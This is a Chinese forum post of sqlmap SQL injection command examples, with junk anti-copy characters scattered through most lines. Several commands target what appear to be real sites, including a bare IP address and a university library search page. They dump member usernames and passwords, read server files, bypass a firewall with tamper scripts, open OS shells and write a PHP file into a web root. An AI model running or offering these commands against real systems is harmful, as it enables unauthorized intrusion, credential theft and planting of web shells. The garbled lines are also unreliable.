找回密码
 立即注册
查看: 3265|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
" R  u8 n9 y3 h5 b& j( c: M$ d* U% a# m; c- m9 P, Q, z
update :::::>     in the folder   after  execute    following   order : svn update  X& G* J0 i* s  b7 Z

& e8 b9 m4 t6 p4 Z$ \0 l8 S; \sqlmap.py -r 1.txt --current-db
, r% R1 }, s) E
1 k8 l+ r3 ?0 L% B0 Pv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
  c2 x8 K0 c5 K# N8 k" B0 A3 O& }) O( D, t2 E9 m6 @
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 0 A- O& C9 R, T2 f4 z% Z
猜解数据库/ @# u. V. v5 |1 Y
./sqlmap.py -u "injection-url" --dbs
! s1 z! q; K* q5 |! D- w% Z) ~sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
! _3 ^" u. \8 `$ c$ M( r1 l7 h
. C- M+ A; `+ z$ E& W, ?猜解表名  P$ E7 }# h  S# Z7 i9 U
./sqlmap.py -u "injection-url" -D database_name --tables' F8 R9 }- a9 a7 e$ r, Y7 Z
+ [$ K! K/ v- W
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"$ F& D( U8 }3 F" Q' {$ R
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
% y; d3 @3 r0 w; D) {; c, z3 f( k9 Q7 W% q
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump- X1 B9 L0 o% a9 G, j* e9 z
1 B: M& @" g7 f2 s$ ]$ m
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
: U7 v" f! F, N9 a( z8 a& jsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py", W8 X& b2 N* L# l' [/ K! v. n' X3 a
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 2 R2 U- P1 T. X5 _& X8 E
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
" H; n0 B9 k3 L* S4 x5 `% o# v4 h) U; x0 g/ {
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
, R( Y2 }' _5 Q! k' y" lsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
2 G/ ?/ A$ }; P, @: Jsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py": o! t+ r0 A# a8 w# ?2 V* o1 A% Z
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"+ ~6 k& n: R2 s9 }
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
& ~) R  |3 {+ g: V" Z" \0 P& j# h8 Y! }6 u, {  K3 z$ q- S
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
) e% F  M. s0 ?2 }! `sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"# \, H4 J5 E5 T) \2 p+ V  U5 ^

2 Q3 H( B% f+ osqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
- f+ ^1 _. @5 ?0 c; u6 U+ E猜解列名- L& r) w; S4 d9 \6 E( x
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
+ }1 N% ]6 t' [) t
' u) V3 l6 y9 L/ ^. ^9 n% Asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
: Y+ B4 S/ V$ J5 S# e$ i! U9 rsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 1 @/ z% f6 c2 G4 K$ ^! L4 [
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"2 ^. C4 f7 p7 [, M: J
  G) m  f  N9 Y9 T
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"( c% I, |% p1 t* s
&submit=Go
2 J. e3 w& V0 ^* m7 K& f) m* a猜解值( r1 S* o- l6 t: |1 t8 y' O
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump& B( i$ \" ~0 F2 C
========================================================3 M8 N2 ]3 M! _6 F2 |! M
搜索表名中包括mana字符的. A  D$ F8 r8 F
/sqlmap.py -u "injection-url" -T mana --search
2 q! c5 i4 y9 u+ `1 K% b返回一个交互式sql shell
6 r- Z# w2 X8 B: C" ?! z/sqlmap.py -u "injection-url" --sql-shell. \9 @- s) _+ B& b: j& i5 @5 ~
读取指定文件(需权限)" E8 n5 m0 v7 F5 k: _
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
; F1 x# n) p7 r查看当前 用户 及 数据库 2 H+ }# ?6 K! P+ B/ N) m
/sqlmap.py -u "injection-url" --current-user --current-db
. G& X8 F5 F9 {6 i: A$ l# w本地文件 写入 远程目标绝对路径
' r; e. @. _3 `. E  }4 |/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
0 Q1 d' x, V4 y" I4 h$ p% j- I& `7 }8 `sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
. a! E2 X( y' D7 I8 n8 Y' g( c1 t" b5 V
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径% d6 [& |; u/ s0 c, P8 ~
查看某用的权限
# Z, y; F: G5 h- d. a1 `/sqlmap.py -u "injection-url" --privileges -U root
+ r1 H1 X8 m9 _" Z& b/ p查看当前用户是否为dba" p2 d6 \% p$ O- K& A
/sqlmap.py -u "injection-url" --is-dba
5 C  G* K0 B' s& x  C; y读取所有数据库用户或指定数据库用户的密码, M  q. V& t: k6 h! S  G' G: q3 ^
sqlmap.py -r 1.txt --users --passwords# h- O, ?" X1 f5 P/ R$ h! H. T
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
) w4 k3 a6 ^' j: e5 i! Z, G3 W' {$ A  Q7 B) c/ x7 r8 O
/sqlmap.py -u "injection-url" --passwords -U root, p+ p) i5 y) M

7 g) `/ G; @1 k. ]  g* P--start&&--stop 与 --first&&--last 的区别
9 @& t1 u9 w/ C7 m) W1 ~6 w. q/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
2 K& W2 i$ G; A' X9 x) e  a- h1 _$ @/ k7 T( F3 E. g/ K
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
1 E# V3 u) l! e) }  _* x/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables" O- Y$ K8 M9 K6 p
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns6 |9 c) W; K3 L0 v& t/ h# U! {

  Z; P9 z& P" ?! g7 h8 b/ m8 ^执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
7 o& v: f; R7 O/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"8 a4 D- q4 m! U' \
1 |! v2 [7 ?7 s8 U! S% s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表